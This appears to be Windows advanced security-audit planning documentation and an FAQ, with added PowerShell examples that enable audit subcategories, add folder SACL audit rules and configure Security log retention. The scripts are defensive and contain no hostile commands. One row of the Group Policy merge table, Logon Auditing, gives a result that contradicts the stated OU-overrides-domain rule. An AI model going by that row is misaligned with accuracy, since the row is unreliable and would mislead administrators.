Security audit policy settings in the supported versions of Windows can be viewed and configured in the following
locations:
Security Settings\Local Policies\Audit Policy.
Security Settings\Local Policies\Security Options.
Security Settings\Advanced Audit Policy Configuration. For more information, see Advanced security
audit policy settings.
Choosing audit settings to use
Depending on your goals, different sets of audit settings may be of particular value to you. For example, some
settings under Security Settings\Advanced Audit Policy Configuration can be used to monitor the following
types of activity:
Data and resources
Users
Network

Important: Settings that are described in the Reference might also provide valuable information about activity
audited by another setting. For example, the settings used to monitor user activity and network activity have
obvious relevance to protecting your data resources. Likewise, attempts to compromise data resources have
huge implications for overall network status, and potentially for how well you are managing the activities of
users on the network.

Data and resource activity


For many organizations, compromising the organization's data resources can cause tremendous financial losses, in
addition to lost prestige and legal liability. If your organization has critical data resources that need to be protected
against any breach, the following settings can provide extremely valuable monitoring and forensic data:
Object Access\Audit File Share. This policy setting allows you to track what content was accessed, the source
(IP address and port) of the request, and the user account that was used for the access. The volume of event
data generated by this setting will vary depending on the number of client computers that attempt to access the
file share. On a file server or domain controller, volume may be high due to SYSVOL access by client
computers for policy processing. If you do not need to record routine access by client computers that have
permissions on the file share, you may want to log audit events only for failed attempts to access the file share.
Object Access\Audit File System. This policy setting determines whether the operating system audits user
attempts to access file system objects. Audit events are only generated for objects (such as files and folders)
that have configured SACLs, and only if the type of access requested (such as Write, Read, or Modify) and
the account that is making the request match the settings in the SACL.
If success auditing is enabled, an audit entry is generated each time any account successfully accesses a file
system object that has a matching SACL. If failure auditing is enabled, an audit entry is generated each time
any user unsuccessfully attempts to access a file system object that has a matching SACL. The amount of
audit data generated by the Audit File System policy setting can vary considerably, depending on the
number of objects that have been configured to be monitored.

Note: To audit user attempts to access all file system objects on a computer, use the Global Object
Access Auditing settings Registry (Global Object Access Auditing) or File System (Global Object Access
Auditing).

Object Access\Audit Handle Manipulation. This policy setting determines whether the operating system
generates audit events when a handle to an object is opened or closed. Only objects with configured SACLs
generate these events, and only if the attempted handle operation matches the SACL.
Event volume can be high, depending on how SACLs are configured. When used together with the Audit
File System or Audit Registry policy settings, the Audit Handle Manipulation policy setting can
provide an administrator with useful "reason for access" audit data that details the precise permissions on
which the audit event is based. For example, if a file is configured as a Read-only resource but a user
attempts to save changes to the file, the audit event will log not only the event, but also the permissions that
were used (or attempted to be used) to save the file changes.
Global Object Access Auditing. A growing number of organizations are using security auditing to
comply with regulatory requirements that govern data security and privacy. But demonstrating that strict
controls are being enforced can be extremely difficult. To address this issue, the supported versions of
Windows include two Global Object Access Auditing policy settings, one for the registry and one for the
file system. When you configure these settings, they apply a global system access control SACL on all
objects of that class on a system, which cannot be overridden or circumvented.

Important: The Global Object Access Auditing policy settings must be configured and applied in
conjunction with the Audit File System and Audit Registry audit policy settings in the Object Access
category.
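To make the Payroll Data example from the mapping section concrete, here is an added PowerShell example (not code from the original guide). It enables the Object Access\Audit File System subcategory with Auditpol.exe and then writes an audit ACE for Delete access by one group into the folder's SACL, which is the combination the text describes: the policy setting turns the subcategory on, the SACL decides which objects and principals generate events. The folder path D:\Payroll Data and the group CORP\Payroll Processors are assumed names. The optional last step shows the Global Object Access Auditing equivalent, which applies the same audit rule to every file on the computer instead of to one folder.

```powershell
# Added example, not from the original page. Assumptions: the folder
# D:\Payroll Data and the group CORP\Payroll Processors exist; run elevated
# (writing a SACL requires SeSecurityPrivilege).
$Folder        = 'D:\Payroll Data'
$Group         = 'CORP\Payroll Processors'
$UseGlobalSacl = $false   # set to $true to also apply a Global Object Access Auditing rule

# 1. Enable the Object Access\Audit File System subcategory (advanced audit policy).
#    Without this, a SACL on the folder produces no events at all.
auditpol.exe /set /subcategory:"File System" /success:enable /failure:enable | Out-Null

# 2. Build the audit ACE: Delete plus DeleteSubdirectoriesAndFiles, for the group,
#    inherited by subfolders and files, recorded on both success and failure.
$rights  = [System.Security.AccessControl.FileSystemRights]::Delete -bor
           [System.Security.AccessControl.FileSystemRights]::DeleteSubdirectoriesAndFiles
$inherit = [System.Security.AccessControl.InheritanceFlags]::ContainerInherit -bor
           [System.Security.AccessControl.InheritanceFlags]::ObjectInherit
$prop    = [System.Security.AccessControl.PropagationFlags]::None
$flags   = [System.Security.AccessControl.AuditFlags]::Success -bor
           [System.Security.AccessControl.AuditFlags]::Failure
$ace = New-Object System.Security.AccessControl.FileSystemAuditRule(
           $Group, $rights, $inherit, $prop, $flags)

# 3. Read the current security descriptor including its SACL (-Audit is required;
#    Get-Acl without it omits the SACL), add the rule, and write it back.
$acl = Get-Acl -Path $Folder -Audit
$acl.AddAuditRule($ace)
Set-Acl -Path $Folder -AclObject $acl

# 4. Verify: list the audit rules now present on the folder.
(Get-Acl -Path $Folder -Audit).GetAuditRules($true, $true, [System.Security.Principal.NTAccount]) |
    Select-Object IdentityReference, FileSystemRights, AuditFlags, IsInherited |
    Format-Table -AutoSize

# 5. (Optional) Global Object Access Auditing: the same rule for every file on the
#    computer, applied through the audit policy rather than per-object SACLs.
#    It still requires the File System subcategory enabled in step 1.
if ($UseGlobalSacl) {
    auditpol.exe /resourceSACL /set /type:File /user:"$Group" /success /failure /access:DE | Out-Null
    auditpol.exe /resourceSACL /type:File /view
}
```

Expect the event volume to scale with how broad the ACE is: an inherited Delete rule on one departmental folder is manageable, whereas the global variant on a busy file server can generate far more data than the earlier planning sections budget for, so test it in the lab first.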

User activity
The settings in the previous section relate to activity involving the files, folders, and network shares that are stored
on a network, and the settings in this section focus on the users, including employees, partners, and customers,
who may try to access those resources.
In the majority of cases, these attempts will be legitimate and a network needs to make vital data readily available
to legitimate users. However in other cases, employees, partners, and others may attempt to access resources that
they have no legitimate reason to access. Security auditing can be used to track a wide variety of user activities on
a particular computer to diagnose and resolve problems for legitimate users and identify and address illegitimate
activities. The following are a few important settings that you should evaluate to track user activity on your
network:
Account Logon\Audit Credential Validation. This is an extremely important policy setting because it enables
you to track every successful and unsuccessful attempt to present credentials for a user logon. In particular, a
pattern of unsuccessful attempts may indicate that a user or application is using credentials that are no longer
valid, or attempting to use a variety of credentials in succession in hope that one of these attempts will
eventually be successful. These events occur on the computer that is authoritative for the credentials. For
domain accounts, the domain controller is authoritative. For local accounts, the local computer is authoritative.
Detailed Tracking\Audit Process Creation and Detailed Tracking\Audit Process Termination. These policy
settings can enable you to monitor the applications that a user opens and closes on a computer.
DS Access\Audit Directory Service Access and DS Access\Audit Directory Service Changes. These policy
settings provide a detailed audit trail of attempts to access, create, modify, delete, move, or undelete objects in
Active Directory Domain Services (AD DS). By default, only domain administrators have permissions to modify AD DS
objects, so it is extremely important to identify malicious attempts to modify these objects. In addition, although
domain administrators should be among an organization's most trusted employees, the use of Audit
Directory Service Access and Audit Directory Service Changes settings allow you to monitor and verify
that only approved changes are made to AD DS. These audit events are logged only on domain controllers.
Logon/Logoff\Audit Account Lockout. Another common security scenario occurs when a user attempts to log
on with an account that has been locked out. It is important to identify these events and to determine whether
the attempt to use an account that has been locked out is malicious.
Logon/Logoff\Audit Logoff and Logon/Logoff\Audit Logon. Logon and logoff events are essential to
tracking user activity and detecting potential attacks. Logon events are related to the creation of logon
sessions, and they occur on the computer that was accessed. For an interactive logon, events are generated
on the computer that was logged on to. For network logon, such as accessing a shared resource, events are
generated on the computer that hosts the resource that was accessed. Logoff events are generated when
logon sessions are terminated.

Note: There is no failure event for logoff activity because failed logoffs (such as when a system abruptly
shuts down) do not generate an audit record. Logoff events are not 100 percent reliable. For example,
the computer can be turned off without a proper logoff and shutdown, and a logoff event is not
generated.

Logon/Logoff\Audit Special Logon. A special logon has administrator-equivalent rights and can be used to
elevate a process to a higher level. It is recommended to track these types of logons. For more information
about this feature, see article 947223 in the Microsoft Knowledge Base.
Object Access\Audit Certification Services. This policy setting allows you to track and monitor a wide variety of
activities on a computer that hosts Active Directory Certificate Services (AD CS) role services to ensure that
only authorized users are performing or attempting to perform these tasks, and that only authorized or desired
tasks are being performed.
Object Access\Audit File System and Object Access\Audit File Share. These policy settings are described in the
previous section.
Object Access\Audit Handle Manipulation. This policy setting and its role in providing "reason for access" audit
data is described in the previous section.
Object Access\Audit Registry. Monitoring for changes to the registry is one of the most critical means that
an administrator has to ensure malicious users do not make changes to essential computer settings. Audit
events are only generated for objects that have configured SACLs, and only if the type of access that is
requested (such as Write, Read, or Modify) and the account making the request match the settings in the
SACL.

Important: On critical systems where all attempts to change registry settings need to be tracked, you
can combine the Audit Registry policy setting with the Global Object Access Auditing policy
settings to ensure that all attempts to modify registry settings on a computer are tracked.

Object Access\Audit SAM. The Security Accounts Manager (SAM) is a database that is present on
computers running Windows that stores user accounts and security descriptors for users on the local
computer. Changes to user and group objects are tracked by the Account Management audit category.
However, user accounts with the proper user rights could potentially alter the files where the account and
password information is stored in the system, bypassing any Account Management events.
Privilege Use\Audit Sensitive Privilege Use. Privilege Use policy settings and audit events allow you to track
the use of certain rights on one or more systems. If you configure this policy setting, an audit event is
generated when sensitive rights requests are made.
Network activity
The following network activity policy settings allow you to monitor security-related issues that are not necessarily
covered in the data or user activity categories, but that can be equally important for network status and protection.
Account Management. The policy settings in this category can be used to track attempts to create, delete, or
modify user or computer accounts, security groups, or distribution groups. Monitoring these activities
complements the monitoring strategies you select in the user activity and data activity sections.
Account Logon\Audit Kerberos Authentication Service and Account Logon\Audit Kerberos Service Ticket
Operations. Audit policy settings in the Account Logon category monitor activities that relate to the use of
domain account credentials. These policy settings complement the policy settings in the Logon/Logoff
category. The Audit Kerberos Authentication Service policy setting allows you to monitor the status of
and potential threats to the Kerberos service. The Audit Kerberos Service Ticket Operations policy
setting allows you to monitor the use of Kerberos service tickets.

Note: Account Logon policy settings apply only to specific domain account activities, regardless of the
computer that is accessed, whereas Logon/Logoff policy settings apply to the computer that hosts the
resources being accessed.
Account Logon\Audit Other Account Logon Events. This policy setting can be used to track a number of
different network activities, including attempts to create Remote Desktop connections, wired network
connections, and wireless connections.
DS Access. Policy settings in this category allow you to monitor the AD DS role services, which provide
account data, validate logons, maintain network access permissions, and provide other services that are critical
to the secure and proper functioning of a network. Therefore, auditing the rights to access and modify the
configuration of a domain controller can help an organization maintain a secure and reliable network. In
addition, one of the key tasks performed by AD DS is the replication of data between domain controllers.
Logon/Logoff\Audit IPsec Extended Mode, Logon/Logoff\Audit IPsec Main Mode, and Logon/Logoff\Audit
IPsec Quick Mode. Many networks support large numbers of external users, including remote employees and
partners. Because these users are outside the organization's network boundaries, IPsec is often used to help
protect communications over the Internet by enabling network-level peer authentication, data origin
authentication, data integrity, data confidentiality (encryption), and protection against replay attacks. You can
use these settings to ensure that IPsec services are functioning properly.
Logon/Logoff\Audit Network Policy Server. Organizations that use RADIUS (IAS) and Network Access
Protection (NAP) to set and maintain security requirements for external users can use this policy setting to
monitor the effectiveness of these policies and to determine whether anyone is attempting to circumvent these
protections.
Policy Change. These policy settings and events allow you to track changes to important security policies on a
local computer or network. Because policies are typically established by administrators to help secure network
resources, any changes or attempts to change these policies can be an important aspect of security
management for a network.
Policy Change\Audit Audit Policy Change. This policy setting allows you to monitor changes to the audit policy.
If malicious users obtain domain administrator credentials, they can temporarily disable essential security audit
policy settings so that their other activities on the network cannot be detected.
Policy Change\Audit Filtering Platform Policy Change. This policy setting can be used to monitor a large variety
of changes to an organization's IPsec policies.
Policy Change\Audit MPSSVC Rule-Level Policy Change. This policy setting determines if the operating
system generates audit events when changes are made to policy rules for the Microsoft Protection Service
(MPSSVC.exe), which is used by Windows Firewall. Changes to firewall rules are important for understanding
the security state of the computer and how well it is protected against network attacks.
Confirm operating system version compatibility
Not all versions of Windows support advanced audit policy settings or the use of Group Policy to apply and
manage these settings. For more info, see Which editions of Windows support advanced audit policy
configuration.
The audit policy settings under Local Policies\Audit Policy overlap with audit policy settings under Security
Settings\Advanced Audit Policy Configuration. However, the advanced audit policy categories and
subcategories make it possible to focus your auditing efforts on the most critical activities while reducing the
amount of audit data that is less important to your organization.
For example, Local Policies\Audit Policy contains a single setting called Audit account logon events. When this
setting is configured, it generates at least 10 types of audit events.
In comparison, the Account Logon category under Security Settings\Advanced Audit Policy Configuration
provides the following advanced settings, which allow you to focus your auditing:
Credential Validation
Kerberos Authentication Service
Kerberos Service Ticket Operations
Other Account Logon Events
These settings allow you to exercise much tighter control over which activities or events generate event data.
Some activities and events will be more important to your organization, so define the scope of your security audit
policy as narrowly as possible.
Success, failure, or both
Whichever event settings you include in your plan, you also have to decide whether you want to log an event when
the activity fails, when an activity succeeds, or both successes and failures. This is an important question, and the
answer will be based on the criticality of the event and the implications of the decision on event volume.
For example, on a file server that is accessed frequently by legitimate users, you may be interested in logging an
event only when an unsuccessful attempt to access data takes place, because this could be evidence of an
unauthorized or malicious user. And in this instance, logging successful attempts to access the server would
quickly fill the event log with benign events.
On the other hand, if the file share has extremely sensitive and valuable information, such as trade secrets, you
may want to log every access attempt, whether successful or unsuccessful, so that you have an audit trail of every
user who accessed the resource.
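The choice described above (failure-only on a busy file server, success and failure on a sensitive one) is made per subcategory. The following script is an added example, not code from the original document or from Microsoft: it applies such a choice with auditpol.exe and reads the effective value back so that the result can be verified. The subcategory names are the ones Windows uses (the four Account Logon subcategories listed above plus File Share); which outcome to audit for each is an assumption chosen to match the scenarios in the text, and the script must run from an elevated prompt.

```powershell
# Added example, not part of the original document: apply a success/failure
# choice per audit subcategory with auditpol.exe and read the effective value
# back. Subcategory names are the ones Windows uses; which ones to enable and
# for what outcome is an assumption made to match the scenarios in the text.

# Desired policy, constructed for this example. Valid values are
# 'Success', 'Failure', 'Success and Failure' and 'No Auditing'.
$DesiredAuditPolicy = [ordered]@{
    'Credential Validation'              = 'Success and Failure'
    'Kerberos Authentication Service'    = 'Failure'
    'Kerberos Service Ticket Operations' = 'Failure'
    'Other Account Logon Events'         = 'Success and Failure'
    # Busy file server: failures only, so benign traffic does not fill the log.
    'File Share'                         = 'Failure'
}

function Set-AuditSubcategory {
    param(
        [Parameter(Mandatory)][string]$Subcategory,
        [Parameter(Mandatory)][string]$Setting
    )
    $success = if ($Setting -match 'Success') { 'enable' } else { 'disable' }
    $failure = if ($Setting -match 'Failure') { 'enable' } else { 'disable' }
    # auditpol /set edits the effective audit policy of this computer and
    # needs an elevated prompt.
    & auditpol.exe /set "/subcategory:$Subcategory" "/success:$success" "/failure:$failure" | Out-Null
    if ($LASTEXITCODE -ne 0) { throw "auditpol could not set '$Subcategory'" }
}

function Get-AuditSubcategory {
    param([Parameter(Mandatory)][string]$Subcategory)
    # /r prints CSV; the 'Inclusion Setting' column is the effective value.
    $rows = & auditpol.exe /get "/subcategory:$Subcategory" /r |
        Where-Object { $_ -ne '' } | ConvertFrom-Csv
    return $rows.'Inclusion Setting'
}

function Invoke-AuditPolicyApply {
    param([Parameter(Mandatory)][System.Collections.IDictionary]$Policy)
    foreach ($name in $Policy.Keys) {
        Set-AuditSubcategory -Subcategory $name -Setting $Policy[$name]
        $effective = Get-AuditSubcategory -Subcategory $name
        # One row per subcategory: requested value, effective value, and
        # whether they agree (a mismatch usually means a GPO overrode the change).
        [pscustomobject]@{
            Subcategory = $name
            Requested   = $Policy[$name]
            Effective   = $effective
            Matches     = ($effective -eq $Policy[$name])
        }
    }
}

Invoke-AuditPolicyApply -Policy $DesiredAuditPolicy | Format-Table -AutoSize
```

Reading the value back through auditpol /get is the important half: on a domain-joined computer a Group Policy refresh can overwrite what was set locally, and the Matches column makes that visible immediately rather than at the next log review.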

Planning for security audit monitoring and management
Networks can contain hundreds of servers running critical services or storing critical data, all of which need to be
monitored. The number of client computers on the network can easily range into the tens or even hundreds of
thousands. This may not be an issue if the ratio of servers or client computers per administrator is low. Even if an
administrator who is responsible for auditing security and performance issues has relatively few computers to
monitor, you need to decide how an administrator will obtain event data to review. Following are some options for
obtaining the event data.
Will you keep event data on a local computer until an administrator logs on to review this data? If so, then the
administrator needs to have physical or remote access to the Event Viewer on each client computer or server,
and the remote access and firewall settings on each client computer or server need to be configured to enable
this access. In addition, you need to decide how often an administrator can visit each computer, and adjust the
size of the audit log so that critical information is not deleted if the log reaches its maximum capacity.
Will you collect event data so that it can be reviewed from a central console? If so, there are a number of
computer management products, such as the Audit Collection Services in Operations Manager 2007 and 2012,
which can be used to collect and filter event data. Presumably this solution enables a single administrator to
review larger amounts of data than using the local storage option. But in some cases, this can make it more
difficult to detect clusters of related events that can occur on a single computer.
In addition, whether you choose to leave audit data on an individual computer or consolidate it at a central
location, you need to decide how large the log file should be and what should happen when the log reaches its
maximum size. To configure these options, open Event Viewer, expand Windows Logs, right-click Security, and
click Properties. You can configure the following properties:
Overwrite events as needed (oldest events first). This is the default option, which is an acceptable solution
in most situations.
Archive the log when full, do not overwrite events. This option can be used when all log data needs to be
saved, but it also suggests that you may not be reviewing audit data frequently enough.
Do not overwrite events (Clear logs manually). This option stops the collection of audit data when the log
file reaches its maximum size. Older data is retained at the expense of the most recent audit events. Use this
option only if you do not want to lose any audit data, do not want to create an archive of the event log, and are
committed to reviewing data before the maximum log size is reached.
You can also configure the audit log size and other key management options by using Group Policy settings. You
can configure the event log settings in the following locations within the GPMC: Computer
Configuration\Administrative Templates\Windows Components\Event Log Service\Security. These
options include:
Maximum Log Size (KB). This policy setting specifies the maximum size of the log files. The user
interfaces in the Local Group Policy Editor and Event Viewer allow you to enter values as large as 2 TB. If
this setting is not configured, event logs have a default maximum size of 20 megabytes.
Log Access. This policy setting determines which user accounts have access to log files and what usage
rights are granted.
Retain old events. This policy setting controls event log behavior when the log file reaches its maximum size.
When this policy setting is enabled and a log file reaches its maximum size, new events are not written to the
log and are lost. When this policy setting is disabled and a log file reaches its maximum size, new events
overwrite old events.
Backup log automatically when full. This policy setting controls event log behavior when the log file
reaches its maximum size and takes effect only if the Retain old events policy setting is enabled. If you enable
these policy settings, the event log file is automatically closed and renamed when it is full. A new file is then
started. If you disable or do not configure this policy setting and the Retain old events policy setting is
enabled, new events are discarded and the old events are retained.
In addition, a growing number of organizations are being required to store archived log files for a number of
years. You should consult with regulatory compliance officers in your organization to determine whether such
guidelines apply to your organization. For more information, see the IT Compliance Management Guide.
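The three Event Viewer options and the Group Policy settings above all end up in the Security log's configuration, which can be read and set without opening either console. The script below is an added example, not code from the original document or from Microsoft: it reports the log's maximum size and retention behaviour (mapped onto the three Event Viewer options named above), flags a log smaller than a chosen minimum, and changes the configuration with wevtutil.exe. The 256 MB minimum is an assumption for the example, not a documented value; the 20 MB figure the text gives is the default.

```powershell
# Added example, not part of the original document: inspect and set the
# Security log's size and retention configuration. The 256 MB minimum is an
# assumption chosen for this example.

function Get-SecurityLogRetention {
    param([long]$MinimumSizeBytes = 256MB)

    # Get-WinEvent -ListLog returns the log's configuration, not its events.
    $log = Get-WinEvent -ListLog 'Security'

    # LogMode maps onto the three Event Viewer options described in the text.
    $mode = switch ("$($log.LogMode)") {
        'Circular'   { 'Overwrite events as needed (oldest events first)' }
        'AutoBackup' { 'Archive the log when full, do not overwrite events' }
        'Retain'     { 'Do not overwrite events (Clear logs manually)' }
        default      { "Unknown ($($log.LogMode))" }
    }

    [pscustomobject]@{
        LogName            = $log.LogName
        MaximumSizeMB      = [math]::Round($log.MaximumSizeInBytes / 1MB, 1)
        RetentionBehaviour = $mode
        RecordCount        = $log.RecordCount
        IsEnabled          = $log.IsEnabled
        # A small log on a busy server loses events before anyone reviews them.
        SizeBelowMinimum   = ($log.MaximumSizeInBytes -lt $MinimumSizeBytes)
    }
}

function Set-SecurityLogRetention {
    param(
        [Parameter(Mandatory)][long]$MaximumSizeBytes,
        [ValidateSet('Circular', 'AutoBackup', 'Retain')][string]$Mode = 'Circular'
    )
    # wevtutil sl (set-log): /ms is the maximum size in bytes; /rt (retain)
    # and /ab (auto-backup) together select one of the three retention modes.
    $retain = if ($Mode -eq 'Circular')   { 'false' } else { 'true' }
    $backup = if ($Mode -eq 'AutoBackup') { 'true' }  else { 'false' }
    & wevtutil.exe sl Security "/ms:$MaximumSizeBytes" "/rt:$retain" "/ab:$backup"
    if ($LASTEXITCODE -ne 0) { throw 'wevtutil could not update the Security log configuration' }
    # Read the configuration back so the caller sees the effective result.
    Get-SecurityLogRetention -MinimumSizeBytes $MaximumSizeBytes
}

# Report the current state; call Set-SecurityLogRetention from an elevated
# prompt to change it, for example:
#   Set-SecurityLogRetention -MaximumSizeBytes 1GB -Mode Circular
Get-SecurityLogRetention | Format-List
```

Note that a size set this way is overwritten by the Group Policy setting Maximum Log Size (KB) at the next policy refresh if that setting is configured, which is why the check function reads the effective configuration rather than a registry value.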

Deploying the security audit policy
Before deploying the audit policy in a production environment, it is critical that you determine the effects of the
policy settings that you have configured. The first step in assessing your audit policy deployment is to create a test
environment in a lab and use it to simulate the various use scenarios that you have identified to confirm that the
audit settings you have selected are configured correctly and generate the type of results you intend.
However, unless you are able to run fairly realistic simulations of network usage patterns, a lab setup cannot
provide you with accurate information about the volume of audit data that the audit policy settings you selected
will generate and how effective your plan for monitoring audit data will be. To provide this type of information, you
need to conduct one or more pilot deployments. These pilot deployments could involve:
A single OU that contains critical data servers or an OU that contains all desktop computers in a specified
location.
A limited set of security audit policy settings, such as Logon/Logoff and Account Logon.
A combination of limited OUs and audit policy settings—for example, targeting servers in only the Accounting
OU with Object Access policy settings.
After you have successfully completed one or more limited deployments, you should confirm that the audit data
that is collected is manageable with your management tools and administrators. When you have confirmed that
the pilot deployment is effective, you need to confirm that you have the necessary tools and staff to expand the
deployment to include additional OUs and sets of audit policy settings until the production deployment is
complete.
Advanced security auditing FAQ
4/5/2019

Applies to
Windows 10
This topic for the IT professional lists questions and answers about understanding, deploying, and managing
security audit policies.
What is Windows security auditing and why might I want to use it?
What is the difference between audit policies located in Local Policies\Audit Policy and audit policies located in Advanced Audit Policy Configuration?
What is the interaction between basic audit policy settings and advanced audit policy settings?
How are audit settings merged by Group Policy?
What is the difference between an object DACL and an object SACL?
Why are audit policies applied on a per-computer basis rather than per user?
What are the differences in auditing functionality between versions of Windows?
Can I use advanced audit policy from a domain controller running Windows Server 2003 or Windows 2000 Server?
What is the difference between success and failure events? Is something wrong if I get a failure audit?
How can I set an audit policy that affects all objects on a computer?
How do I figure out why someone was able to access a resource?
How do I know when changes are made to access control settings, by whom, and what the changes were?
How can I roll back security audit policies from the advanced audit policy to the basic audit policy?
How can I monitor if changes are made to audit policy settings?
How can I minimize the number of events that are generated?
What are the best tools to model and manage audit policy?
Where can I find information about all the possible events that I might receive?
Where can I find more detailed information?

What is Windows security auditing and why might I want to use it?
Security auditing is a methodical examination and review of activities that may affect the security of a system. In
the Windows operating systems, security auditing is more narrowly defined as the features and services that
enable an administrator to log and review events for specified security-related activities.
Hundreds of events occur as the Windows operating system and the applications that run on it perform their tasks.
Monitoring these events can provide valuable information to help administrators troubleshoot and investigate
security-related activities.

What is the difference between audit policies located in Local Policies\Audit Policy and audit policies located in Advanced Audit Policy Configuration?
The basic security audit policy settings in Security Settings\Local Policies\Audit Policy and the advanced
security audit policy settings in Security Settings\Advanced Audit Policy Configuration\System Audit
Policies appear to overlap, but they are recorded and applied differently. When you apply basic audit policy
settings to the local computer by using the Local Security Policy snap-in (secpol.msc), you are editing the effective
audit policy, so changes made to basic audit policy settings will appear exactly as configured in Auditpol.exe.
There are a number of additional differences between the security audit policy settings in these two locations.
There are nine basic audit policy settings under Security Settings\Local Policies\Audit Policy and settings
under Advanced Audit Policy Configuration. The settings available in Security Settings\Advanced Audit
Policy Configuration address similar issues as the nine basic settings in Local Policies\Audit Policy, but they
allow administrators to be more selective in the number and types of events to audit. For example, the basic audit
policy provides a single setting for account logon, and the advanced audit policy provides four. Enabling the single
basic account logon setting would be the equivalent of setting all four advanced account logon settings. In
comparison, setting a single advanced audit policy setting does not generate audit events for activities that you are
not interested in tracking.
In addition, if you enable success auditing for the basic Audit account logon events setting, only success events
will be logged for all account logon–related behaviors. In comparison, depending on the needs of your
organization, you can configure success auditing for one advanced account logon setting, failure auditing for a
second advanced account logon setting, success and failure auditing for a third advanced account logon setting, or
no auditing.
The nine basic settings under Security Settings\Local Policies\Audit Policy were introduced in Windows 2000.
Therefore, they are available in all versions of Windows released since then. The advanced audit policy settings
were introduced in Windows Vista and Windows Server 2008. The advanced settings can only be used on
computers running Windows 7, Windows Server 2008, and later.

What is the interaction between basic audit policy settings and advanced audit policy settings?
Basic audit policy settings are not compatible with advanced audit policy settings that are applied by using Group
Policy. When advanced audit policy settings are applied by using Group Policy, the current computer's audit policy
settings are cleared before the resulting advanced audit policy settings are applied. After you apply advanced audit
policy settings by using Group Policy, you can only reliably set system audit policy for the computer by using the
advanced audit policy settings.
Editing and applying the advanced audit policy settings in Local Security Policy modifies the local Group Policy
Object (GPO), so changes made here may not be exactly reflected in Auditpol.exe if there are policies from other
domain GPOs or logon scripts. Both types of policies can be edited and applied by using domain GPOs, and these
settings will override any conflicting local audit policy settings. However, because the basic audit policy is recorded
in the effective audit policy, that audit policy must be explicitly removed when a change is desired, or it will remain
in the effective audit policy. Policy changes that are applied by using local or domain Group Policy settings are
reflected as soon as the new policy is applied.

Important Whether you apply advanced audit policies by using Group Policy or by using logon scripts, do not
use both the basic audit policy settings under Local Policies\Audit Policy and the advanced settings under
Security Settings\Advanced Audit Policy Configuration. Using both advanced and basic audit policy
settings can cause unexpected results in audit reporting.

If you use Advanced Audit Policy Configuration settings or use logon scripts to apply advanced audit policies, be
sure to enable the Audit: Force audit policy subcategory settings (Windows Vista or later) to override
audit policy category settings policy setting under Local Policies\Security Options. This will prevent conflicts
between similar settings by forcing basic security auditing to be ignored.

How are audit settings merged by Group Policy?
By default, policy options that are set in GPOs and linked to higher levels of Active Directory sites, domains, and
OUs are inherited by all OUs at lower levels. However, an inherited policy can be overridden by a GPO that is
linked at a lower level.
For example, you might use a domain GPO to assign an organization-wide group of audit settings, but want a
certain OU to get a defined group of additional settings. To accomplish this, you can link a second GPO to that
specific lower-level OU. Therefore, a logon audit setting that is applied at the OU level will override a conflicting
logon audit setting that is applied at the domain level (unless you have taken special steps to apply Group Policy
loopback processing).
The rules that govern how Group Policy settings are applied propagate to the subcategory level of audit policy
settings. This means that audit policy settings configured in different GPOs will be merged if no policy settings
configured at a lower level exist. The following table illustrates this behavior.

Auditing subcategory         | Setting configured in an OU GPO (higher priority) | Setting configured in a domain GPO (lower priority) | Resulting policy for the target computer
Detailed File Share Auditing | Success                                           | Failure                                             | Success
Process Creation Auditing    | Disabled                                          | Success                                             | Disabled
Logon Auditing               | Success                                           | Failure                                             | Failure

What is the difference between an object DACL and an object SACL?
All objects in Active Directory Domain Services (AD DS), and all securable objects on a local computer or on the
network, have security descriptors to help control access to the objects. Security descriptors include information
about who owns an object, who can access it and in what way, and what types of access are audited. Security
descriptors contain the access control list (ACL) of an object, which includes all of the security permissions that
apply to that object. An object's security descriptor can contain two types of ACLs:
A discretionary access control list (DACL) that identifies the users and groups who are allowed or denied access
A system access control list (SACL) that controls how access is audited
The access control model that is used in Windows is administered at the object level by setting different levels of
access, or permissions, to objects. If permissions are configured for an object, its security descriptor contains a
DACL with security identifiers (SIDs) for the users and groups that are allowed or denied access.
If auditing is configured for the object, its security descriptor also contains a SACL that controls how the security
subsystem audits attempts to access the object. However, auditing is not completely configured unless a SACL has
been configured for an object and a corresponding Object Access audit policy setting has been configured and
applied.

Why are audit policies applied on a per-computer basis rather than per user?
In security auditing in Windows, the computer, objects on the computer, and related resources are the primary
recipients of actions by clients including applications, other computers, and users. In a security breach, malicious
users can use alternate credentials to hide their identity, or malicious applications can impersonate legitimate users
to perform undesired tasks. Therefore, the most consistent way to apply an audit policy is to focus on the computer
and the objects and resources on that computer.
In addition, because audit policy capabilities can vary between computers running different versions of Windows,
the best way to ensure that the audit policy is applied correctly is to base these settings on the computer instead of
the user.
However, in cases where you want audit settings to apply only to specified groups of users, you can accomplish
this by configuring SACLs on the relevant objects to enable auditing for a security group that contains only the
users you specify. For example, you can configure a SACL for a folder called Payroll Data on Accounting Server 1.
This can audit attempts by members of the Payroll Processors OU to delete objects from this folder. The Object
Access\Audit File System audit policy setting applies to Accounting Server 1, but because it requires a
corresponding resource SACL, only actions by members of the Payroll Processors OU on the Payroll Data folder
generates audit events.

What are the differences in auditing functionality between versions of Windows?
Basic audit policy settings are available in all versions of Windows since Windows 2000, and they can be applied
locally or by using Group Policy. Advanced audit policy settings were introduced in Windows Vista and Windows
Server 2008, but the settings can only be applied by using logon scripts in those versions. Advanced audit policy
settings, which were introduced in Windows 7 and Windows Server 2008 R2, can be configured and applied by
using local and domain Group Policy settings.

Can I use advanced audit policies from a domain controller running Windows Server 2003 or Windows 2000 Server?
To use advanced audit policy settings, your domain controller must be installed on a computer running Windows
Server 2012 R2, Windows Server 2012, Windows Server 2008 R2, Windows Server 2008, or Windows Server
2003 with Service Pack 2 (SP2). Windows 2000 Server is not supported.

What is the difference between success and failure events? Is something wrong if I get a failure audit?
A success audit event is triggered when a defined action, such as accessing a file share, is completed successfully.
A failure audit event is triggered when a defined action, such as a user logon, is not completed successfully.
The appearance of failure audit events in the event log does not necessarily mean that something is wrong with
your system. For example, if you configure Audit Logon events, a failure event may simply mean that a user
mistyped his or her password.

How can I set an audit policy that affects all objects on a computer?
System administrators and auditors increasingly want to verify that an auditing policy is applied to all objects on a
system. This has been difficult to accomplish because the system access control lists (SACLs) that govern auditing
are applied on a per-object basis. Thus, to verify that an audit policy has been applied to all objects, you would have
to check every object to be sure that no changes have been made—even temporarily to a single SACL. Introduced
in Windows Server 2008 R2 and Windows 7, security auditing allows administrators to define global object access
auditing policies for the entire file system or for the registry on a computer. The specified SACL is then
automatically applied to every object of that type. This can be useful for verifying that all critical files, folders, and
registry settings on a computer are protected, and for identifying when an issue with a system resource occurs. If a
file or folder SACL and a global object access auditing policy (or a single registry setting SACL and a global object
access auditing policy) are configured on a computer, the effective SACL is derived from combining the file or
